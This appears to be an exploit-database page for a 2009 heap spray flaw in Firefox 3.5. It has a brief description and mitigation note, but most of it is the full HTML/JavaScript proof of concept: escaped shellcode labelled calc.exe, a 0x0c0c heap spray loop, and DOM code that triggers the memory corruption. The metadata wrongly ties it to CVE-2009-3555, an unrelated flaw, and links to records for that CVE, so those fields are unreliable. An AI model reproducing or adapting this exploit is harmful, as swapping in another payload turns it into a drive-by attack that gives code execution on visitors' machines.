header-logo
Suggest Exploit
vendor:
Firefox
by:
SBerry aka Simon Berry-Byrne
9,3
CVSS
HIGH
Heap Spray Vulnerabilty
119
CWE
Product Name: Firefox
Affected Version From: 3.5
Affected Version To: 3.5.2
Patch Exists: YES
Related CWE: CVE-2009-3555
CPE: a:mozilla:firefox:3.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0986/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0880/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0807/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0865/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0770/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0987/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0768/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0786/https://www.rapid7.com/db/vulnerabilities/sunpatch-145102/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0440/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0338/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0130/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0337/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0339/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0167/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0162/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0119/https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2009-3555/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-3555/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0019-cve-2009-3555/https://www.rapid7.com/db/?q=CVE-2009-3555&type=&page=2https://www.rapid7.com/db/?q=CVE-2009-3555&type=&page=3https://www.rapid7.com/db/?q=CVE-2009-3555&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Firefox 3.5 Vulnerability

This vulnerability is related to the Firefox 3.5 browser. It is a heap spray vulnerability which allows an attacker to execute arbitrary code on the target system. The exploit is based on a memory corruption vulnerability in the browser's JavaScript engine. The exploit is triggered by a malicious JavaScript code which is embedded in a web page. The code is executed when the user visits the page. The exploit uses a heap spray technique to inject malicious code into the browser's memory. The malicious code is then executed, allowing the attacker to gain control of the target system.

Mitigation:

The vulnerability can be mitigated by applying the latest security patches from Mozilla. Additionally, users should be aware of the risks associated with visiting untrusted websites and should avoid clicking on suspicious links.
Source

Exploit-DB raw data:

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]

Navigation

Suggest Exploit

Services By CQR